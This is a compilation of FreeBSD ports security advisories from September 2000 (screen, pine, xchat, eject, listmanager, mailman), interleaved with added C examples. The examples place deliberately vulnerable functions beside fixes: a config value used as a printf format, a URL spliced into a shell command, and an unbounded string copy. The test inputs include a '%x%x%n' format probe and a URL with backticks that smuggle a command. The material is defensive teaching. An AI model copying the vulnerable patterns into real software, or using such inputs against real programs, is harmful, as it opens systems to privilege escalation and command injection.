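        parsed++;
        if (r.action != 'b' || strcmp(r.ifname, ifname) != 0)
            continue;
        t->blocked_total++;
        if (strcmp(r.proto, "tcp") != 0)
            t->non_tcp++;
        else if (strchr(r.flags, 'S') && !strchr(r.flags, 'A'))
            t->new_syn++;
        else if (strchr(r.flags, 'F') || strchr(r.flags, 'R'))
            t->teardown++;
        else
            t->mid_stream++;
    }
    return parsed;
}

/* Constructed sample in the thread's layout (not real traffic). */
static const char *const SAMPLE_LOG[] = {
    "router# ipmon",
    "...",
    "13/09/2000 12:34:54.393687 ep0 @0:3 b 192.0.2.10,2854 -> 198.51.100.80,80 PR tcp len 20 40 -AF IN",
    "13/09/2000 12:34:54.393690 ep0 @0:3 b 192.0.2.11,1757 -> 198.51.100.80,80 PR tcp len 20 40 -A IN",
    "13/09/2000 12:34:54.393701 ep0 @0:3 b 192.0.2.12,1854 -> 198.51.100.80,80 PR tcp len 20 40 -AFP IN",
    "13/09/2000 12:34:54.393712 ep0 @0:3 b 192.0.2.13,1456 -> 198.51.100.80,80 PR tcp len 20 40 -R IN",
    "13/09/2000 12:34:55.000001 ep0 @0:3 b 192.0.2.14,3859 -> 198.51.100.80,23 PR tcp len 20 40 -S IN",
    "13/09/2000 12:34:55.000002 ep0 @0:3 b 192.0.2.15,1026 -> 198.51.100.80,53 PR udp len 20 60 IN",
    "13/09/2000 12:34:55.000003 xl0 @0:3 b 192.0.2.16,4000 -> 198.51.100.80,80 PR tcp len 20 40 -R IN",
};
#define SAMPLE_N (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

static struct tally sample;
static int sample_count = -1;

/* Tally of the sample for ep0, computed once. */
const struct tally *sample_tally(void)
{
    if (sample_count < 0)
        sample_count = tally_blocked(SAMPLE_LOG, SAMPLE_N, "ep0", &sample);
    return &sample;
}

int sample_parsed(void) { sample_tally(); return sample_count; }

int main(void)
{
    const struct tally *t = sample_tally();
    printf("records parsed: %d\n", sample_parsed());
    printf("blocked on ep0: %d (teardown %d, mid-stream %d, new SYN %d, non-tcp %d)\n",
           t->blocked_total, t->teardown, t->mid_stream, t->new_syn, t->non_tcp);
    return 0;
}
```

A high teardown share with a low new-SYN share is the pattern the thread describes: the blocks are the final FIN/RST exchange arriving after the state entry was torn down, which is a timeout tuning question rather than hostile traffic; a rising new-SYN or mid-stream count is what deserves attention in the log.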
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:46.screen
Message-Id: <20000913202928.D0BFA37B42C@hub.freebsd.org>
Date: Wed, 13 Sep 2000 13:29:28 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:46                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          screen port contains local root compromise

Category:       ports
Module:         screen
Announced:      2000-09-12
Affects:        Ports collection prior to the correction date.
Corrected:      2000-09-01
Credits:        Jouko Pynnönen
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

screen is a popular application that multiplexes a physical terminal
between several processes.

II.  Problem Description

The screen port, versions 3.9.5 and before, contains a vulnerability
which allows local users to gain root privileges. This is accomplished
by inserting string-formatting operators into configuration parameters,
which may allow arbitrary code to be executed.

The screen port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains over 3800 third-party applications in a ready-to-install
format. The ports collections shipped with FreeBSD 3.5.1 and 4.1
contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Local users can obtain root privileges.

If you have not chosen to install the screen port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Remove the setuid bit on the program: execute the following command as
root:

chmod 555 /usr/local/bin/screen-3.9.5

Note that this should be considered a temporary measure and may affect
the behaviour of the screen program.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the screen port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/misc/screen-3.9.8.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/misc/screen-3.9.8.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/misc/screen-3.9.8.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/misc/screen-3.9.8.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/misc/screen-3.9.8.tgz

NOTE: It may be several days before updated packages are available.

3) download a new port skeleton for the screen port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOb3qBVUuHi5z0oilAQHxTAP/XNdxRQGk2Ei+/Mx8EogmFKyyDPqjLN2B
XxQ9Dl4kl5vcYKHy+gwa4vIlns2LetrJZoj7gD0+zQKEsqdm+7ZtqiGXjllvWDAT
u76+nJiE2UWSugIZ0c7fvqLYhOR6SUp9cbx6JHDH1jjQneDKjOnHxQ2O04DdA3dz
0M1ywz6lcsk=
=odjq
-----END PGP SIGNATURE-----
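The bug class named in section II (user-controlled text ending up as the format argument of a printf-family call) is easy to see in a few lines. What follows is an added example, not screen's code and not taken from the advisory: a message-building wrapper of the kind such programs contain, the wrong and the right way of passing a configuration value through it, and a small check that counts conversion specifiers so a loader or an audit can flag values that must never become a format. The wrapper name and the sample value are assumptions for the example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Wrapper in the style of programs that build messages from a format plus
 * arguments. Such a wrapper hides the format from compiler checks, which is
 * how a configuration value ends up being treated as one. */
static int emit(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

static char render_buf[128];

/* Wrong: the configuration value itself becomes the format. This function
 * is only ever fed values without conversions in this example, because a
 * "%x" or "%n" in the value would make vsnprintf read or write through
 * variadic arguments that were never passed. */
const char *render_vulnerable(const char *config_value)
{
    emit(render_buf, sizeof render_buf, config_value);
    return render_buf;
}

/* Right: a constant format; the value is only ever bound to %s and any
 * '%' inside it is copied as data. */
const char *render_safe(const char *config_value)
{
    emit(render_buf, sizeof render_buf, "%s", config_value);
    return render_buf;
}

/* Count conversion specifiers in a string. "%%" is a literal percent and is
 * not counted; a lone trailing '%' is. A loader can reject any value whose
 * count is non-zero before the value can reach a format argument. */
int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {  /* escaped percent */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    const char *value = "100%% sure";    /* constructed sample value */
    printf("as format: %s\n", render_vulnerable(value));
    printf("as data:   %s\n", render_safe(value));
    printf("conversions in \"%%x%%x%%n\": %d\n", count_conversions("%x%x%n"));
    return 0;
}
```

The two renderings of the same value differ only because the first one interprets it: that difference is the whole bug, and the fix is the constant format in render_safe, not filtering of the input. count_conversions is a belt-and-braces check, useful for spotting values in configuration files that a setuid program will read.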
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:47.pine
Message-Id: <20000913203343.E73D837B43C@hub.freebsd.org>
Date: Wed, 13 Sep 2000 13:33:43 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:47                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          pine4 port allows denial of service

Category:       ports
Module:         pine4
Announced:      2000-09-13
Affects:        Ports collection.
Corrected:      2000-07-17
Credits:        Juhapekka Tolvanen
Vendor status:  Contacted
FreeBSD only:   NO

I.   Background

Pine is a popular mail user agent.

II.  Problem Description

The pine4 port, versions 4.21 and before, contained a bug which would
cause the program to crash when processing a folder which contains an
email message with a malformed X-Keywords header. The message itself
could be deleted within pine if identified, but other operations such
as closing the folder with the message still present would cause the
program to crash with no apparent cause, discarding changes to the
mailbox.

The FreeBSD port of pine4 was changed on 2000-07-17 to use an updated
version of the c-client library which is used to handle the mailbox
processing. This library does not contain the bug and versions of pine4
built with it (i.e. ports or packages dated after the correction date)
do not suffer from this vulnerability.

The pine4 port is not installed by default, nor is it "part of FreeBSD"
as such: it is part of the FreeBSD ports collection, which contains
over 3800 third-party applications in a ready-to-install format. The
ports collections shipped with FreeBSD 4.1 and 3.5.1 contain this
problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Remote users can cause pine4 to crash when closing a mail folder by
sending a malformed email.

If you have not chosen to install the pine4 port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Deinstall the pine4 port/package, if you have installed it.

It may be possible to use a mail filtering utility such as procmail
(available in FreeBSD ports as /usr/ports/mail/procmail) to filter out
the malformed X-Keywords header from incoming mail, but this solution
is not discussed here.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the pine4 port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/pine-4.21.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/pine-4.21.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/pine-4.21.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/pine-4.21.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/pine-4.21.tgz

NOTE: Be sure to check the file creation date on the package, because
the version number of the software has not changed.

3) download a new port skeleton for the listmanager port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOb/kgFUuHi5z0oilAQEwgAQAnYgLOfvgfM88DLjUXgoZBkVRoroeU8rz
2DXUw4LEQ6ARzruWPepALW2Yls+g5SraDCLHmuTo6tb3vR6kwQ97gQmzNCNDxK9T
/5m4EFYo2ErTOB4nO/MqepJ+/0t4oBPByhaRjQBSqQncaN4FIkWgboqfpbYdL6HC
cnQSlc+0FPs=
=R2n+
-----END PGP SIGNATURE-----
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:48.xchat
Message-Id: <20000913203434.C464137B43C@hub.freebsd.org>
Date: Wed, 13 Sep 2000 13:34:34 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:48                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          xchat port inappropriately handles URLs

Category:       ports
Module:         xchat, xchat-devel
Announced:      2000-09-13
Affects:        Ports collection.
Corrected:      2000-08-27
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

Xchat is a popular graphical IRC client.

II.  Problem Description

The xchat IRC client provides the ability to launch URLs displayed in
an IRC window in a web browser by right clicking on the URL. However
this was handled incorrectly in versions prior to 1.4.3, and prior to
1.5.7 in the 1.5 development series, and allowed a malicious IRC user
to embed command strings in a URL which could cause an arbitrary
command to be executed as the local user if the URL were to be
"launched" in a browser as described above.

The xchat port is not installed by default, nor is it "part of FreeBSD"
as such: it is part of the FreeBSD ports collection, which contains
over 3800 third-party applications in a ready-to-install format. The
ports collections shipped with FreeBSD 4.0 and 3.5.1 contain this
problem since it was discovered after the release.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Remote IRC users can cause an arbitrary command to be executed by the
local user, if they attempt to launch a malformed URL by right clicking
on it.

If you have not chosen to install the xchat or xchat-devel
ports/packages, then your system is not vulnerable to this problem.

IV.  Workaround

Do not attempt to launch URLs which contain the ` (backtick) character.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the xchat or
xchat-devel port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/xchat-1.4.3.tgz

3) download a new port skeleton for the xchat port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOb/kBlUuHi5z0oilAQEoEgP+Lso/K6rgAVDeWfsfean7fmKVX1ViID0j
LUGlnLGohzSRC14W+21NIfChc0yl9gMmJRgkNHRLPkuyQBmdp8iHBsQlejjeq2PH
ZqSF6++V3YBqm4H7EgfaNKTk3wn0l/8w+dw3l9iMxmcS8P1oxo4lq04Ufao/N8TS
iCWpAmNQI44=
=0uMP
-----END PGP SIGNATURE-----
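The reason a backtick in a URL matters is that the URL is handed to a shell as part of a command line, and the shell evaluates it before the browser is started. Below is an added example, not xchat's code and not from the advisory: the risky shape (returned as a string rather than executed, so the splice can be inspected), an allowlist check on the URL, and a launcher that passes the URL as a single argv element with no shell in between. The browser command name and the double-quoted command shape are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* The risky shape: the URL is spliced into a command line intended for
 * /bin/sh. Inside double quotes the shell still evaluates backticks and
 * $(...), so anything between them runs before the browser does. This
 * function only builds the string; nothing in this example executes it. */
const char *build_shell_command(const char *browser, const char *url)
{
    static char cmd[512];
    snprintf(cmd, sizeof cmd, "%s \"%s\"", browser, url);
    return cmd;
}

/* Allowlist check: a known scheme, printable ASCII only, and none of the
 * characters a shell treats specially. Defence in depth only; the launcher
 * below does not rely on it to keep a shell out of the path. */
int url_is_launchable(const char *url)
{
    static const char *const schemes[] = { "http://", "https://", "ftp://" };
    const unsigned char *p;
    size_t i;
    int scheme_ok = 0;

    for (i = 0; i < sizeof schemes / sizeof schemes[0]; i++)
        if (strncmp(url, schemes[i], strlen(schemes[i])) == 0)
            scheme_ok = 1;
    if (!scheme_ok)
        return 0;
    for (p = (const unsigned char *)url; *p; p++) {
        if (*p <= ' ' || *p >= 0x7f)              /* control, space, non-ASCII */
            return 0;
        if (strchr("`\"'\\|;&<>$(){}", *p))        /* shell metacharacters */
            return 0;
    }
    return 1;
}

/* Hardened launcher: fork + exec with the URL as exactly one argv element.
 * The browser receives it byte for byte, whatever it contains; there is no
 * shell to interpret it. Returns the browser's exit status, or -1 when the
 * URL is rejected or the process cannot be started. */
int launch_url(const char *browser, const char *url)
{
    pid_t pid;
    int status;

    if (!url_is_launchable(url))
        return -1;
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execlp(browser, browser, url, (char *)NULL);
        _exit(127);                       /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample URLs; "example.com" is a reserved test domain. */
    const char *clean = "http://www.freebsd.org/ports/";
    const char *odd   = "http://example.com/a`b`c";
    printf("shell would see: %s\n", build_shell_command("browser", odd));
    printf("%s -> %s\n", clean, url_is_launchable(clean) ? "ok" : "rejected");
    printf("%s -> %s\n", odd, url_is_launchable(odd) ? "ok" : "rejected");
    return 0;
}
```

The fix that actually closes the hole is launch_url's use of exec with an argv, which removes the shell from the path entirely; url_is_launchable is a second layer that also keeps control characters and odd schemes away from the browser.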
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:49.eject
Message-Id: <20000913203457.E4D9137B69F@hub.freebsd.org>
Date: Wed, 13 Sep 2000 13:34:57 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:49                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          eject port allows local root exploit

Category:       ports
Module:         eject
Announced:      2000-09-13
Affects:        Ports collection.
Corrected:      2000-08-21
Credits:        Discovered during internal auditing
Vendor status:  Contacted
FreeBSD only:   NO

I.   Background

Eject is a utility for ejecting the media from a CD or optical disk
drive.

II.  Problem Description

The eject program is installed setuid root, and contains several
exploitable buffers which can be overflowed by local users, yielding
root privileges.

The eject port is not installed by default, nor is it "part of FreeBSD"
as such: it is part of the FreeBSD ports collection, which contains
over 3800 third-party applications in a ready-to-install format. The
ports collections shipped with FreeBSD 4.1 and 3.5.1 contain this
problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Unprivileged users can obtain root privileges on the local system.

If you have not chosen to install the eject port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Deinstall the eject port/package, if you have installed it, or limit
the file permissions on the /usr/local/sbin/eject file (e.g. remove
setuid permission, or limit it to a trusted group)

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the eject port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/sysutils/eject-1.4.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/sysutils/eject-1.4.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/sysutils/eject-1.4.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/sysutils/eject-1.4.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/sysutils/eject-1.4.tgz

NOTE: Be sure to check the file creation date on the package, because
the version number of the software has not changed.

3) download a new port skeleton for the eject port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOb/kCVUuHi5z0oilAQHfygP/d5QizD/ClKWD6MiKke2lspaI4sLTAKAh
QpnrJv2nF7tgK5DV+7X8J9f4dtSLippccwCscsvF8GT8d6RleP3dN0KfDRou/W/d
BVUgj2SfRNvsacbc8SyiaekT8ylne70WcYT93RrJ7vWbxTRXGEnOkbJD1rgDSksP
RLywyeVfI+U=
=G4Dr
-----END PGP SIGNATURE-----
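Section II describes fixed-size buffers in a setuid program being filled from user-supplied arguments without a length check. The following is an added example, not eject's code and not from the advisory, showing that pattern beside a bounded replacement: a device name taken from the command line is validated against what a device name can look like, length-checked, and copied with snprintf whose truncation is treated as an error. The buffer sizes and the "/dev/" prefix are assumptions for the example.

```c
#include <stdio.h>
#include <string.h>

/* The shape the advisory describes, kept only for contrast: a fixed buffer
 * filled by an unbounded copy of a user-controlled argument. An argument
 * longer than the buffer writes past its end. It is never called below. */
void vulnerable_device_path(char out[64], const char *arg)
{
    strcpy(out, "/dev/");
    strcat(out, arg);          /* no length check at all */
}

/* Hardened replacement. Device names are short, lowercase letters and
 * digits, and never contain '/'; anything else is rejected outright. The
 * copy is bounded, and a would-be truncation is an error, not a silent
 * accept. Returns 0 on success, -1 if the argument is rejected. */
int safe_device_path(char *out, size_t outsz, const char *arg)
{
    size_t i, n = strlen(arg);

    if (n == 0 || n > 32)
        return -1;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)arg[i];
        if (!((c >= 'a' && c <= 'z') || (c >= '0' && c <= '9')))
            return -1;         /* rejects '/', '.', '-', spaces, controls */
    }
    if ((size_t)snprintf(out, outsz, "/dev/%s", arg) >= outsz)
        return -1;             /* result would not fit: refuse, do not clip */
    return 0;
}

static char demo_buf[16];      /* deliberately small so truncation is reachable */

/* Validated "/dev/<name>" for arg, or NULL if the argument was rejected. */
const char *demo_path(const char *arg)
{
    return safe_device_path(demo_buf, sizeof demo_buf, arg) == 0 ? demo_buf : NULL;
}

int main(void)
{
    /* Constructed sample arguments. */
    const char *args[] = { "cd0", "acd0", "../etc/passwd", "aaaaaaaaaaaa", "" };
    size_t i;
    for (i = 0; i < sizeof args / sizeof args[0]; i++) {
        const char *p = demo_path(args[i]);
        printf("%-16s -> %s\n", args[i], p ? p : "(rejected)");
    }
    return 0;
}
```

The length check on its own would stop the overflow; the allowlist is there because a setuid program that opens whatever path it is handed has a second problem even without one, and refusing a truncated result avoids quietly operating on a different device than the one named.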
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:50.listmanager
Message-Id: <20000913203545.063E137B660@hub.freebsd.org>
Date: Wed, 13 Sep 2000 13:35:45 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:50                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          listmanager port allows local root compromise

Category:       ports
Module:         listmanager
Announced:      2000-09-13
Affects:        Ports collection.
Corrected:      2000-09-08
Credits:        Discovered during internal auditing
Vendor status:  Updated version released.
FreeBSD only:   NO

I.   Background

Listmanager is a mailing list manager.

II.  Problem Description

The listmanager port, versions prior to 2.105.1, contained several
locally exploitable buffer overflow vulnerabilities which could be used
to gain root privileges. Since the source code to listmanager is not
available, it is difficult to determine whether there are remaining
security vulnerabilities, or whether the software was previously
exploitable remotely, but we believe the author has made a good faith
effort to improve the security of the code.

The listmanager port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains over 3800 third-party applications in a ready-to-install
format. The ports collections shipped with FreeBSD 4.1 and 3.5.1
contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Unprivileged users can obtain root privileges on the local system.

If you have not chosen to install the listmanager port/package, then
your system is not vulnerable to this problem.

IV.  Workaround

Deinstall the listmanager port/package, if you have installed it.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the listmanager
port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/listmanager-2.105.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/listmanager-2.105.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/listmanager-2.105.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/listmanager-2.105.1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/listmanager-2.105.1.tgz

NOTE: It may be several days before updated packages are available.

3) download a new port skeleton for the listmanager port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOb/kC1UuHi5z0oilAQGUUwQArIH9EegIaatzGdjc9t1g8y7hKEajUTzC
Y5qeFxkOKosCMEEVfiZns6mo+nMuQsTwfxgthCnsCqX9PDXXAWrBjDOixmhp5nB3
3ro8UvTiivXIplzncCEbBWZocXCLZWLPV2uoemsr3Py9OZHmCeXKuqsX0OonIHDy
r+cAObdg7XA=
=YlxZ
-----END PGP SIGNATURE-----
From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:51.mailman Reply-To: security-advisories@freebsd.org Message-Id: <20000913203617.7D4D137B6B7@hub.freebsd.org> Date: Wed, 13 Sep 2000 13:36:17 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:51 Security Advisory FreeBSD, Inc. Topic: mailman port allows local root compromise Category: ports Module: mailman Announced: 2000-09-13 Affects: Ports collection. Corrected: 2000-08-05 Credits: Vendor status: Updated version released. FreeBSD only: NO I. Background Mailman is a mailing list manager. II. Problem Description The mailman port, versions prior to 2.0b5, contained several locally exploitable vulnerabilities which could be used to gain root privileges. The mailman port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3800 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 4.1 and 3.5.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Unprivileged users can obtain root privileges on the local system. If you have not chosen to install the mailman port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the mailman port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the mailman port. 
2) Deinstall the old package and install a new package dated after the correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/mailman-2.0b5.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/mailman-2.0b5.tgz

NOTE: It may be several days before updated packages are available.

3) Download a new port skeleton for the mailman port from: http://www.freebsd.org/ports/ and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

